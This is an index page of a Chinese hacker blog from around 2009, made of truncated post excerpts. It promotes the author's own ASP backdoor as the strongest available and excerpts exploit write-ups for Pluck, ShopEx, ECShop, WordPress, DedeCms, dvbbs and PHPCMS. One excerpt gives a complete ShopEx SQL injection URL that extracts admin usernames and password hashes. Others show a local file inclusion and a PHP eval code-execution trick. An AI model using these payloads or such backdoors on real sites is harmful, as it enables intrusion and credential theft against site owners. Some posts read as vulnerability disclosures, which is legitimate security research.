导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

[置顶] [原创]心动吧数据库防下载小工具

 这一个文章和我以前发布的一个文章正好成了一个对比(文章连接),如果上一次是茅。那么此次这个就是盾了.为什么这样说?请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。

例图:

[置顶] 心动吧警告:除20080508外并未发布其他版本

 先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。

[置顶] [原创]2009-1-18发布新版◆心动吧asp在线◆

心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门

 此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式

Pluck CMS 4.6.1 (module_pages_site.php post) LFI Exploit

<?php

/*

pluck v 4.6.1 LFI exploit

autor : Alfons Luja

Vuln is in \data\modules\blog\module_pages_site.php

...

$includepage = 'blog_include.php';

//Only set 'view post'-page if a post has been specified

if (isset($_GET['post'])) {

//Check if post exists, and include information

if (file_exists('data/settings/modules/blog/posts/'.$_GET['post'])) {

include('data/settings/modules/blog/posts/'.$_GET['post']);

$module

....

ECShop注射漏洞

 if (empty($_GET['type']))

    {

        ...

    }

    elseif ($_GET['type'] == 'collection')

    {

        ...

...

Wordpress 管理员远程执行代码漏洞

 文章来源:【HNC网络联盟】 http://www.803389.com/html/bug/3903/

#内容#

Wordpress-2.7.0漏洞

date: 2008-12-18

一分析:

这个漏洞出在后台:(



wp-admin/post.php

...

ShopEx 4.7.2 0day

# 鬼仔:感谢无名的投递。

作者:无名

我是无名,这次写一个shopex4.7.2漏洞,

已经通知了官方,今天就发出来,

首先syssite/shopadmin/order_service.php后台这个文件没有验证用户身份,

重要的是$v_id参数没有过滤

 

syssite/shopadmin/order_service.php?m_id=1&key=986078fbe1474d61464d08535f1002a8&&v_id=1+and+1=2+union+select+concat(username,0x20,userpass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+sdb_mall_offer_operater%23
...

PHP-CMS Project SQL注入漏洞

摘自:乱雪's Blog

绿盟的漏洞公告:http://www.nsfocus.net/vulndb/12879

程序官方站:http://sourceforge.net/projects/php-cms-project/

...

DedeCms V51GBK_SP1_B88 的一个漏洞

来源:phpeval's BLOG
作者:phpeval

include/inc_request_vars.php

 


//注册请求字符串并加转义
function FilterNotSafeString(&$str)
{
   global $cfg_notallowstr,$cfg_replacestr;

PHP的一个EVAL

来源:phpeval's BLOG
作者:phpeval

前段时间一个程序出的问题。就和这差不多。

<?php      $code="${${eval($_GET[c])}}";  ?>
对于上面的代码。如果在URL提交http://www.phpeval.cn/test.php?c=phpinfo(); 就可以发现phpinfo()被执行了。而相应的提交c=echo 11111; 发现1111也被输出了。这个代码被执行了。

(好些PHP的代码在写文件的时候。都没有注意到这一点

dvbbs php 的一个小注入

摘自:phpeval

dispuser.php文件

 

$UserName = trim($name);                    //这句开始出问题
if( is_numeric($id) ){
  $showUserID = intval($id);
} else{                                     //一个逻辑问题
  if( $UserName == '' ){
    $ErrCodes = $lang['UrlArgError'];        //by: phpeval
  }
}

 

PHPCMS2007 SP6 的一个注入

来源:phpeval's BLOG
作者:phpeval

digg/digg_add.php

XML/HTML代码
$mod = $digg_mod;      
if ($mod && $id)     
{         
$table_end = $channelid == 0?'':'_' . $channelid;      $table_name = $CONFIG['tablepre'] . $mod . $table_end; //$mod没有任何验证就进去了。         
$mod_id = $mod . 'id';         
if ($mod == 'article')         
{          ………………      }         
else        
{             

P3P Header Tips

摘自 P3P Header Tips

关于P3P,还是有必要讲一下。好像之前我和朋友讨论网易那个跨域实现的时候忘记讲清楚了,那个P3P头是必须要的,后面的 set-cookie 才能成功。

对于IE来说(默认安全级别下),iframe、img、link等标签都是只发送session cookie(又叫 第一方cookie),拦截本地cookie发送(又叫第三方cookie)。当这些标签跨域引用一个页面,实际上是发起了一次GET请求。

如果这个跨域的请求,HTTP返回头中带有Set-Cookie , 那么这个cookie对浏览器来说,实际上是无效的。

看如下测试

假设有 www.a.com    与 www.b.com 两个域

在 www.b.com 上有一个页面,其中包含一个指向 www.a.com 的iframe
 

分页:[«]1[»]

日历

<< 2014-4 >>

Sun

Mon

Tue

Wed

Thu

Fri

Sat

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

站内搜索

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved